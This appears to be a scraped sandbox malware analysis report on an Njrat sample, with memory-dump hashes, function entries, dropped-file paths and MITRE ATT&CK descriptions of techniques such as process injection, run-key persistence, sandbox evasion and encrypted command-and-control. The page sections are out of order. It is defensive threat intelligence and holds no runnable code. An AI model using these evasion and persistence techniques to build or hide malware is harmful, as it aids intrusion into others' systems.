Associated: 0000000E.00000002.2357048192.0000000000B01000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B08000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B15000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B17000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B1E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B23000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B44000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B55000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B5D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B66000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000B6A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000C45000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000C48000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2357048192.0000000000C61000.00000040.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_9b0000_8d9ba8e0d68a3d306883c186c2013957Windows Update.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 32bb7870683b6f7b1e67ed84e24ec12697881852445d4039ebd7a1b9ec058732
Instruction ID: 52d47019d4f67e5ca440667085e3130352818e6767d28221ebf437510ace75e9
Opcode Fuzzy Hash: 32bb7870683b6f7b1e67ed84e24ec12697881852445d4039ebd7a1b9ec058732
Instruction Fuzzy Hash: B7E0E2B6310208ABDB24DE8CE8C4BAE33EDE768311F1084A1FA19D7604D235EC549B61

Function 03570006 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2361523008.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3570000_8d9ba8e0d68a3d306883c186c2013957Windows Update.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59a8b68058ffe2d8a9af215685c0fb2afa78526ab3d48ca64233dbcb8e956c55
Instruction ID: a1e03899e5b7c78e84acefd746d1a80360f3ff0a3ee2f134c458ea0bbda45e84
Opcode Fuzzy Hash: 59a8b68058ffe2d8a9af215685c0fb2afa78526ab3d48ca64233dbcb8e956c55
Instruction Fuzzy Hash: E111C22104E7C25FC34387749CA66957FB06F4320874E85CBD094CFAA3C658692DD762

Function 035700A8 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2361523008.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3570000_8d9ba8e0d68a3d306883c186c2013957Windows Update.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf3252be2dc6a318a089f6c18714063d652ef358b275bd4e804b0fd7defe3a59
Instruction ID: d2d30aaf4b1c45571d440f7b689b3ae871274c71c9d9b20a8e5214f0b31c4489
Opcode Fuzzy Hash: bf3252be2dc6a318a089f6c18714063d652ef358b275bd4e804b0fd7defe3a59
Instruction Fuzzy Hash: 84F0FC32A003046BD714DFB0CC52B9F7BA2EF81614F1081BED545DF2D1DA3198418780

Function 035701FC Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2361523008.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3570000_8d9ba8e0d68a3d306883c186c2013957Windows Update.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5984c666ebeaf353c09301b9c92297f0e55b1fe2b6454bd80913926200b7cbd
Instruction ID: 8e60597dd69aa9a4e6eed4424d801c3dbe04a3fc1f62ba4ec50dc3a86a0f9d29
Opcode Fuzzy Hash: f5984c666ebeaf353c09301b9c92297f0e55b1fe2b6454bd80913926200b7cbd
Instruction Fuzzy Hash: 1D01FB34625652DFCB00EFB4E05995D7BE2BFC8208B40881CE0958B328EB759909DB42

Function 035740A8 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2361523008.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3570000_8d9ba8e0d68a3d306883c186c2013957Windows Update.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b43cdb40b6d6b8524ed3f0a74fec805d3d231b041ea3a4de4617f97dcb9a0a1c
Instruction ID: 6cc749ebeef2ed5866316b966792726eb71e070c63df35fafd72979fb6936ff9
Opcode Fuzzy Hash: b43cdb40b6d6b8524ed3f0a74fec805d3d231b041ea3a4de4617f97dcb9a0a1c
Instruction Fuzzy Hash: 8BE04F31115750CFC7259F34E0A699A77B1EF5A20836404BEC4868B751E736D442CB40

Function 012223F4 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2358519080.0000000001222000.00000040.00000800.00020000.00000000.sdmp, Offset: 01222000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1222000_8d9ba8e0d68a3d306883c186c2013957Windows Update.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53d81064209ad5b3b8c3dd88dbefcf6b025924acc84158eb8ee35a55628ba9a9
Instruction ID: 88584372de74829cd2c0073fe0915f56268684e2ff79f22cec362310afd54d9e
Opcode Fuzzy Hash: 53d81064209ad5b3b8c3dd88dbefcf6b025924acc84158eb8ee35a55628ba9a9
Instruction Fuzzy Hash: 39D02E782016E28FE3128B0CC1A4B8A3BE0AB40704F4600FAEC008B7B3C368E880C210

Function 012223BC Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2358519080.0000000001222000.00000040.00000800.00020000.00000000.sdmp, Offset: 01222000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1222000_8d9ba8e0d68a3d306883c186c2013957Windows Update.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f8a2db1743b5e503bbff9da777af502194db0541a02d65d513d3603a1bb4eff
Instruction ID: 67cd40e015036eb7b598dc6ccf2548720cc31fe72569c4cedd6a377605ad36ef
Opcode Fuzzy Hash: 1f8a2db1743b5e503bbff9da777af502194db0541a02d65d513d3603a1bb4eff
Instruction Fuzzy Hash: 91D05E342012828BDB19DB0CC6D4F5D3BD4AF40705F0644E8BD108B772C3B5E880CA00

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report LisectAVT_2403002B_366.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Njrat

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Notepad.exe

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

C:\Program Files (x86)\Explower.exe

C:\Program Files\7-Zip\Uninstall.exe

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RRqyIX.exe_152a71c642bbbcd7fd442643df33529b74505d85_06902e4b_5f2b330f-a3e7-41c9-bf73-f30df8d8d06a\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB57A.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB82A.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB85A.tmp.xml

Windows Analysis Report
LisectAVT_2403002B_366.exe

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre